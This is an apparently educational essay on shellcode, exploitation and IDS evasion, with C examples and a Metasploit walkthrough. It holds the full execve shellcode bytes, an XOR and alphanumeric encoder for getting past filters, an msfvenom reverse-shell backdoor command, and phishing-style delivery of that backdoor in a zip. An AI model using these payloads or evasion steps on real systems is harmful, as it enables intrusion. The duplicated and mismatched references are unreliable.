Discipline knowledge and capabilities
Shellcode is a small, self-contained sequence of machine instructions that an attacker injects into a vulnerable process in order to take control of the target application, machine or server. The name comes from its traditional purpose of spawning a command shell, but any code delivered this way is called shellcode. Most shellcode is delivered through memory-corruption bugs such as stack and heap overflows, which let the attacker redirect execution into the injected bytes [2]. Because it runs inside the exploited process with no loader to help it, shellcode is written in (or compiled down to) raw assembly, must be position independent, and must avoid any byte that the delivery path cannot carry.
Shellcode makes the target program behave in a way its author never intended. The most direct way to do useful work from inside a hijacked process is to force it to make a system call. On 32-bit Linux the shellcode places the syscall number in EAX and the arguments in EBX, ECX, EDX and so on, then executes the int 0x80 instruction [4]. When any program executes int 0x80, the CPU switches to kernel mode and the kernel dispatches the syscall the attacker selected, for example execve("/bin/sh", ...) to spawn a shell. On x86-64 the syscall instruction plays the same role, with the number in RAX.
Attackers compromise systems by running exploit programs, which take advantage of bugs in the software running on the target. Whether a bug is exploitable is established by analysing it properly: understanding the technical capabilities of the program and the connections it accepts and uses. An exploitation technique can be stated as an algorithm that takes control of the execution flow of a vulnerable program [2]; if it succeeds, the attacker gains full control over the program and, through it, the system. Exploiting a software bug therefore requires more than a valid input that triggers the bug: it needs a suitable technique that changes the execution flow so that the attacker's commands run. The simplest form of exploit program is the proof-of-concept (PoC) exploit, which demonstrates that the flaw can be reached and controlled without necessarily delivering a useful payload. Exploit tools let attackers achieve their intentions through such software flaws. The attack vector is the path by which the exploit reaches and makes use of the vulnerability [3]; even without a software defect, reaching a particular section of code may require a large number of actions to trigger it. A usable exploit combines a trigger for the bug, an exploitation technique and a payload, and the payload most often adds a user account or changes the system configuration. In the last few years modifying the system configuration has been one of the most reliable ways to obtain and keep access, so many exploits carry payloads that alter the configuration of the whole system.
Digital literacy
Evasion techniques make attack detection challenging for intrusion detection systems (IDS) and intrusion prevention systems (IPS). Cheng et al. [2] discuss five evasion techniques and how well current systems cope with them; the main ones are as follows. A denial of service (DoS) attack against the detector attempts to exhaust one of its resources (CPU, memory or state tables) so that it drops or skips traffic. Packet splitting chops the attack data into small packets, so that a system that does not reassemble the stream never sees the complete pattern it needs for signature matching [2]. Duplicate insertion is a well-known technique that misleads the detector by sending TCP/IP packets with duplicate sequence numbers or overlapping offsets: the IDS and the target host may resolve the duplicates differently, so the IDS reconstructs a stream that the host never actually processes. Shellcode mutation changes the attacker's shellcode, by encoding or polymorphism, so that it no longer matches known signatures. Attackers continuously look for new ways of intruding into systems, and system developers in turn look for ways to analyse and detect attacks [5]. Detection systems fall into two categories, signature based and anomaly based. Signature-based systems look for the signs of known attacks in network traffic and therefore need frequent updates to keep their signature database current. Anomaly-based systems, often built with machine learning, look for traffic that deviates from normal profiles [1]; instead of inspecting payload content alone they consider features such as throughput, payload size, the number of flows per connection and other connection state.
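The packet-splitting case above, as an added example written for this page (not code from the cited papers): a signature matcher that inspects each TCP segment on its own misses a pattern cut across segments, while one that reassembles the stream by sequence offset finds it. The flow, its offsets and the signature string are constructed for the illustration.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* One TCP segment of a flow: seq is the byte offset within the stream
 * (a relative sequence number) and data is the segment payload. */
typedef struct {
    size_t seq;
    const char *data;
} segment_t;

/* Constructed sample flow (not real capture data). The string "/bin/sh" is
 * cut across all three segments, and the segments arrive out of order. */
static const segment_t FLOW[] = {
    { 11, "n/s" },
    { 14, "h HTTP/1.0\r\n" },
    { 0,  "GET /cgi/bi" },
};
#define FLOW_LEN (sizeof FLOW / sizeof FLOW[0])

static const char SIGNATURE[] = "/bin/sh";

/* Naive inspection: search each packet on its own. Any signature that
 * straddles a segment boundary is missed. */
bool per_packet_match(const segment_t *segs, size_t n, const char *sig)
{
    for (size_t i = 0; i < n; i++)
        if (strstr(segs[i].data, sig) != NULL)
            return true;
    return false;
}

/* Stream-aware inspection: place every segment at its sequence offset,
 * require the result to be gap-free and overlap-free, then search. */
bool reassembled_match(const segment_t *segs, size_t n, const char *sig)
{
    char stream[512];
    size_t placed = 0, end = 0;

    memset(stream, 0, sizeof stream);
    for (size_t i = 0; i < n; i++) {
        size_t len = strlen(segs[i].data);
        if (segs[i].seq + len >= sizeof stream)
            return false;               /* too large for this toy buffer */
        memcpy(stream + segs[i].seq, segs[i].data, len);
        placed += len;
        if (segs[i].seq + len > end)
            end = segs[i].seq + len;
    }
    /* placed < end means a gap, placed > end means overlapping segments
     * (the raw material of duplicate insertion). A real IDS would alert on
     * the anomaly itself; this toy simply has no complete stream to search. */
    if (placed != end)
        return false;
    stream[end] = '\0';
    return strstr(stream, sig) != NULL;
}

int main(void)
{
    printf("per-packet: %s, reassembled: %s\n",
           per_packet_match(FLOW, FLOW_LEN, SIGNATURE) ? "match" : "miss",
           reassembled_match(FLOW, FLOW_LEN, SIGNATURE) ? "match" : "miss");
    return 0;
}
```

The reassembler deliberately refuses to report on a stream with gaps or overlapping segments. Overlapping segments with conflicting contents are exactly what duplicate insertion sends, and a real IDS must either model the target host's reassembly policy or treat the overlap as an alert in its own right.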
A program counter is a CPU register that holds the address of the next instruction to be executed; the instruction is then fetched from memory at that address. The counter is needed to execute a task while keeping track of the current point of execution. The program counter is also called the instruction counter, instruction pointer (EIP on 32-bit x86, RIP on x86-64) or sequence control register [1]. Each location in memory has a specific address. As each instruction is processed, the processor updates the program counter with the address of the next instruction to be fetched and passes that value to the memory address register as part of the fetch-execute cycle. Normally the program counter is simply incremented by the length of the instruction just fetched (by one word on fixed-width architectures), so that execution proceeds sequentially; branches, calls and returns load a new value into it instead [3]. When the system is reset or restarted, the program counter is loaded with a fixed reset address, which on many simple processors is zero. Physically the program counter is similar to the other processor registers: a bank of latches, each of which holds one bit of the value.
Critical thinking
Code injection is one of the most common types of attack on present-day computer systems. It delivers and runs arbitrary code on a victim's system [1], giving the attacker unauthorized access to and control over system resources, data and applications. In a code injection attack the attacker's first objective is to gain control of the machine's program counter, typically by using a memory-corruption bug to overwrite a saved return address or a function pointer. Once the attacker controls the program counter, execution can be redirected anywhere, including into the injected code, and the behaviour of the program is changed at will.
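An added example (not from the original page) of the bug class this attack relies on: the unbounded strcpy() below is the classic stack overflow that hands the attacker the saved return address, and hence the program counter, and the second function is the bounded form that closes the hole. The buffer size and the oversized input are chosen for the illustration.

```c
#include <stdio.h>
#include <string.h>

#define BUF_LEN 16

/* Vulnerable pattern: strcpy() copies until it finds a NUL, so any input of
 * BUF_LEN bytes or more writes past buf into the saved frame pointer and the
 * saved return address. At this function's ret the CPU loads that overwritten
 * value into the program counter, which is exactly the control the attacker
 * wants. Never call this with untrusted input; it is shown only for contrast. */
size_t vulnerable_copy(const char *input)
{
    char buf[BUF_LEN];
    strcpy(buf, input);
    return strlen(buf);
}

/* Hardened form: copy at most BUF_LEN-1 bytes, always NUL-terminate, and tell
 * the caller whether truncation happened so it can reject the input instead of
 * silently processing a mangled value. */
size_t safe_copy(const char *input, int *truncated)
{
    char buf[BUF_LEN];
    size_t n = strlen(input);

    *truncated = (n >= BUF_LEN);
    if (*truncated)
        n = BUF_LEN - 1;
    memcpy(buf, input, n);
    buf[n] = '\0';
    return strlen(buf);
}

/* Constructed attacker input: 64 bytes, four times the size of buf. */
static const char OVERSIZED[] =
    "AAAAAAAAAAAAAAAA" "AAAAAAAAAAAAAAAA" "AAAAAAAAAAAAAAAA" "AAAAAAAAAAAAAAAA";

int main(void)
{
    int truncated;
    size_t kept = safe_copy(OVERSIZED, &truncated);
    printf("safe_copy kept %zu bytes, truncated=%d\n", kept, truncated);
    /* vulnerable_copy(OVERSIZED) would smash the stack; deliberately not called. */
    return 0;
}
```

In a real exploit the oversized input is not a run of 'A's but a NOP sled, the shellcode, and a return address pointing back into the sled; the bounded copy makes that input harmless because the bytes beyond BUF_LEN-1 are never written.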
Alphanumeric encoding engines are present in Metasploit (for example x86/alpha_mixed and x86/alpha_upper). They transform arbitrary payloads into a representation consisting only of letters and decimal digits. These encodings matter for two reasons [3]. First, alphanumeric shellcode can be stored in atypical and unexpected contexts: it is syntactically valid as file and directory names, user names and passwords, and it passes filters that reject non-printable input. Second, the alphanumeric characters are a small, stable subset of Unicode and UTF-8, so the shellcode survives character-set conversion intact [5]. The difficulty is that the set of x86 instructions whose encodings consist solely of alphanumeric bytes is very small, so useful shellcode cannot be written in them directly. Two methods overcome this restriction: patching, in which alphanumeric instructions rewrite a few non-alphanumeric bytes in place at run time, and self-modification, in which an alphanumeric decoder reconstructs the original payload in memory. Because the engines encode automatically, a matching decoder has to be generated along with the payload, and the challenge is to design a scheme in which both the encoded payload and the decoder that unpacks it consist only of alphanumeric characters. The ultimate goal is to encode arbitrary payloads.
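An added illustration, not Metasploit's own encoder: a toy alphanumeric encoding that, like the real engines, relies only on the low nibble of each letter or digit, so every payload byte becomes two alphanumeric characters and the same byte can be written in several ways. The sample bytes are constructed (the opening of a common 32-bit execve shellcode, not a working exploit) and the seed-based choice among candidate characters is this example's own. The hard part of a real engine, a decoder stub that is itself alphanumeric x86 code, is not reproduced here.

```c
#include <ctype.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed sample payload (not a working exploit): the first bytes of a
 * typical 32-bit x86 execve("/bin//sh") shellcode. Bytes such as 0xc0 and 0x80
 * would never survive a text-only field. */
static const uint8_t PAYLOAD[] = {
    0x31, 0xc0, 0x50, 0x68, 0x2f, 0x2f, 0x73, 0x68,
    0x68, 0x2f, 0x62, 0x69, 0x6e, 0x89, 0xe3, 0xcd, 0x80
};
#define PAYLOAD_LEN (sizeof PAYLOAD)

/* candidates[v] holds every alphanumeric character whose low nibble is v;
 * every nibble 0..15 has at least two such characters ('0','P','p' for 0). */
static char candidates[16][8];
static int  ncand[16];

static void build_table(void)
{
    if (ncand[0] != 0)
        return;                         /* already built */
    for (int c = '0'; c <= 'z'; c++) {
        if (!isalnum(c))
            continue;
        int v = c & 0x0f;
        candidates[v][ncand[v]++] = (char)c;
    }
}

/* Encode each payload byte as two alphanumeric characters, one carrying the
 * high nibble and one the low nibble. seed picks among the candidates, so
 * different seeds give different-looking encodings of the same bytes.
 * out must have room for 2*len+1 bytes. Returns the encoded length. */
size_t alnum_encode(const uint8_t *in, size_t len, unsigned seed, char *out)
{
    build_table();
    for (size_t i = 0; i < len; i++) {
        int hi = in[i] >> 4, lo = in[i] & 0x0f;
        out[2 * i]     = candidates[hi][(seed + i) % ncand[hi]];
        out[2 * i + 1] = candidates[lo][(seed + 2 * i + 1) % ncand[lo]];
    }
    out[2 * len] = '\0';
    return 2 * len;
}

/* Decoder: what the stub does at run time. Only the low nibble of each
 * character matters, which is why several characters can stand for the same
 * nibble. Returns the number of bytes written. */
size_t alnum_decode(const char *in, uint8_t *out)
{
    size_t n = strlen(in) / 2;
    for (size_t i = 0; i < n; i++)
        out[i] = (uint8_t)(((in[2 * i] & 0x0f) << 4) | (in[2 * i + 1] & 0x0f));
    return n;
}

/* True if every byte of s is a letter or digit, i.e. the encoding did its job. */
bool is_alnum_only(const char *s)
{
    for (; *s; s++)
        if (!isalnum((unsigned char)*s))
            return false;
    return true;
}

int main(void)
{
    char encoded[2 * PAYLOAD_LEN + 1];
    uint8_t decoded[PAYLOAD_LEN];

    alnum_encode(PAYLOAD, PAYLOAD_LEN, 1, encoded);
    alnum_decode(encoded, decoded);
    printf("%s -> roundtrip %s\n", encoded,
           memcmp(decoded, PAYLOAD, PAYLOAD_LEN) == 0 ? "ok" : "FAILED");
    return 0;
}
```

Two properties are worth checking on any such scheme: the output really is alphanumeric, and the decoder recovers the original bytes exactly. Because the decoder only masks nibbles, it also decodes the many alternative spellings, which is what gives alphanumeric payloads their variability.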
Identification of the shellcode: the shellcode studied copies user account data from /etc/passwd to /tmp/outfile.
The first command used is "msfconsole", which starts the Metasploit console and gives an overview of the framework [4]. The next step, "show exploits", lists the exploit modules available for attacks of any kind.
In the attack shown, the attacker uses Metasploit's exploit/multi/handler module, which listens for the connection coming back from the victim machine. The next step, "set PAYLOAD windows/meterpreter/reverse_tcp", selects the payload for the attack. The backdoor itself is generated with "msfvenom -p windows/meterpreter/reverse_tcp LHOST=<address> LPORT=<port>", with the output format and file name also given so that a Windows executable, Backdoor.exe, is produced. LHOST is the IP address of the attacking machine that the payload connects back to, and LPORT is the port on which the attacker's handler listens; both machines are assumed to be on the same network [1]. "set LPORT" in the handler must therefore match the port compiled into the payload. Backdoor.exe carries the payload and is the attack vector: it is delivered to the victim in a password-protected archive created with "zip --password 1234 important.zip Backdoor.exe", together with a message persuading the user to open it. The "jobs" command confirms that the handler is running and waiting for the victim machine, and "sessions" lists the active sessions opened once the victim has been exploited.
Problem Solving
For this attack a reverse shell payload is used. In a reverse shell the target machine initiates the connection back to the attacking machine, rather than the attacker connecting in; the attacking machine runs a listener on a chosen port to which the target's shell attaches [2]. This is achieved by the code that executes on the victim, which opens the outbound connection and attaches the shell's input and output to it. Reverse shells are preferred because outbound connections are usually allowed through firewalls and NAT, while inbound connections to the victim are not.
Some of the methods for generating shellcode used in vulnerability exploitation are discussed below:
Msfvenom: Part of the Metasploit Framework, this is usually the most convenient tool for generating a payload at exploitation time [2]. It produces shellcode for many platforms and architectures and emits it in a variety of output formats. Combined with Metasploit's encoders it can also avoid bytes the target cannot accept, such as null bytes, or, with an alphanumeric encoder, restrict the output to printable ASCII letters and digits.
NASM: The most basic approach is to write the shellcode by hand in assembly and assemble it with NASM (the Netwide Assembler); this works for both 32-bit x86 and x86_64. The raw bytes are then extracted from the object file, for example with objdump, and checked for unwanted bytes such as 0x00.
ShellForge: Written in Python, ShellForge produces shellcode from C source. The C program makes its system calls through wrapper functions that replace the standard library, so no libc is needed at run time. To generate the shellcode, ShellForge uses the GCC compiler to translate the C program into assembler, then assembles it and extracts the resulting bytes.
Synesthesia approach: This approach synthesises shellcode that satisfies constraints on the bytes it may contain, for example that it contains no null byte. Such constraints matter because a forbidden byte would be truncated or rejected by the string-handling code that delivers the payload, and because intrusion detection systems and input filters look for byte patterns typical of raw machine code.
pwntools: Part of the CTF (capture the flag) tool set, pwntools is a Python library for exploit development [5]. It is designed for rapid development and prototyping, and its shellcraft module generates shellcode for a given architecture and platform.
Its biggest advantage is the library of predefined shellcode fragments for many platforms and architectures, which can be combined into a payload. At the highest level, shellcode produced with msfvenom can also be embedded, wrapped in a function and supplied as the payload.
Polymorphic shellcode is a technique that encodes the shellcode used to exploit a vulnerability into a polymorphic form in order to sidestep an IPS. Signature-based detection distinguishes shellcode by marks, that is byte patterns, taken from one or a few variants of that shellcode; polymorphism defeats this by making every instance look different. The usual method is for the attacker to scramble (encrypt or compress) the body of the shellcode and prepend a small decoder stub that decodes and decompresses it in memory at run time before jumping into it [2]. The stub and the NOP sled in front of it are varied as well, for instance by substituting instruction sequences with equivalent effect, so that no fixed byte sequence remains for a signature to match.
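An added example (not from the cited survey or from Metasploit) covering both the null-free constraint in the Synesthesia entry and the polymorphic encoding just described: a single-byte XOR encoder that searches for a key under which neither the key nor any encoded byte falls in a forbidden set, and a decoder that is the same XOR loop. The payload is the well-known 25-byte Linux x86 execve("/bin//sh") shellcode, annotated byte by byte to show the int 0x80 system call described earlier; the forbidden set (NUL and '/') is chosen for the illustration, as it would be for a payload smuggled in a file name.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* The classic 32-bit Linux execve("/bin//sh", argv, NULL) shellcode, with the
 * instruction each byte group encodes. It is already null-free, but it
 * contains three '/' bytes that a file-name filter would reject. */
static const uint8_t PAYLOAD[] = {
    0x31, 0xc0,                         /* xor eax, eax                     */
    0x50,                               /* push eax        ; NUL for string */
    0x68, 0x2f, 0x2f, 0x73, 0x68,       /* push 0x68732f2f ; "//sh"         */
    0x68, 0x2f, 0x62, 0x69, 0x6e,       /* push 0x6e69622f ; "/bin"         */
    0x89, 0xe3,                         /* mov ebx, esp    ; ebx = path     */
    0x50,                               /* push eax        ; argv[1] = NULL */
    0x53,                               /* push ebx        ; argv[0] = path */
    0x89, 0xe1,                         /* mov ecx, esp    ; ecx = argv     */
    0x31, 0xd2,                         /* xor edx, edx    ; edx = envp = 0 */
    0xb0, 0x0b,                         /* mov al, 11      ; execve         */
    0xcd, 0x80                          /* int 0x80        ; enter kernel   */
};
#define PAYLOAD_LEN (sizeof PAYLOAD)

/* Bytes the delivery path cannot carry (constructed for this example):
 * NUL terminates C strings and '/' is illegal inside a file name component. */
static const uint8_t BAD[] = { 0x00, 0x2f };
#define BAD_LEN (sizeof BAD)

bool has_bad_bytes(const uint8_t *buf, size_t len, const uint8_t *bad, size_t badlen)
{
    for (size_t i = 0; i < len; i++)
        for (size_t j = 0; j < badlen; j++)
            if (buf[i] == bad[j])
                return true;
    return false;
}

/* Search, starting at 'start', for a single-byte XOR key such that neither the
 * key (it is embedded in the decoder stub) nor any encoded byte is in the bad
 * set. Returns the key, or -1 if none exists. */
int find_xor_key(const uint8_t *in, size_t len, const uint8_t *bad, size_t badlen,
                 unsigned start)
{
    for (unsigned k = 0; k < 256; k++) {
        uint8_t key = (uint8_t)((start + k) & 0xff);
        if (key == 0 || has_bad_bytes(&key, 1, bad, badlen))
            continue;                   /* 0 is the identity; a bad key is unusable */
        bool ok = true;
        for (size_t i = 0; i < len && ok; i++) {
            uint8_t enc = in[i] ^ key;
            ok = !has_bad_bytes(&enc, 1, bad, badlen);
        }
        if (ok)
            return key;
    }
    return -1;
}

/* XOR is its own inverse: this loop is both the encoder run by the attacker's
 * tooling and the decoder executed by the stub on the target. */
size_t xor_transform(const uint8_t *in, size_t len, uint8_t key, uint8_t *out)
{
    for (size_t i = 0; i < len; i++)
        out[i] = in[i] ^ key;
    return len;
}

int main(void)
{
    uint8_t enc[PAYLOAD_LEN], dec[PAYLOAD_LEN];
    int key = find_xor_key(PAYLOAD, PAYLOAD_LEN, BAD, BAD_LEN, 1);

    if (key < 0) {
        puts("no usable single-byte key");
        return 1;
    }
    xor_transform(PAYLOAD, PAYLOAD_LEN, (uint8_t)key, enc);
    xor_transform(enc, PAYLOAD_LEN, (uint8_t)key, dec);
    printf("key 0x%02x, bad bytes after encoding: %s, roundtrip: %s\n", (unsigned)key,
           has_bad_bytes(enc, PAYLOAD_LEN, BAD, BAD_LEN) ? "yes" : "no",
           memcmp(dec, PAYLOAD, PAYLOAD_LEN) == 0 ? "ok" : "FAILED");
    return 0;
}
```

Different starting points give different keys, and therefore different-looking encoded bodies of the same shellcode, which is what defeats a signature taken from one variant. In a real payload the decoder stub is prepended to the encoded body and must itself avoid the forbidden bytes; when no single-byte key works, encoders fall back to multi-byte keys or to additive rather than XOR schemes.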
References
[1] K. Iwamoto and K. Wasaki, "A Method for Shellcode Extraction from Malicious Document Files Using Entropy and Emulation", International Journal of Engineering and Technology, vol. 8, no. 2, pp. 101-106, 2016.
[2] T. Cheng, Y. Lin, Y. Lai and P. Lin, "Evasion Techniques: Sneaking through Your Intrusion Detection/Prevention Systems", IEEE Communications Surveys & Tutorials, vol. 14, no. 4, pp. 1011-1020, 2012.
[3] K. Iwamoto and K. Wasaki, "A Method for Shellcode Extraction from Malicious Document Files Using Entropy and Emulation", International Journal of Engineering and Technology, vol. 8, no. 2, pp. 101-106, 2016.
[4] W. Kim, S. Kang, K. Kim and S. Kim, "Detecting ShellCode Using Entropy", KIPS Transactions on Computer and Communication Systems, vol. 3, no. 3, pp. 87-96, 2014.
[5] I. Arce, "The shellcode generation", IEEE Security & Privacy Magazine, vol. 2, no. 5, pp. 72-76, 2004.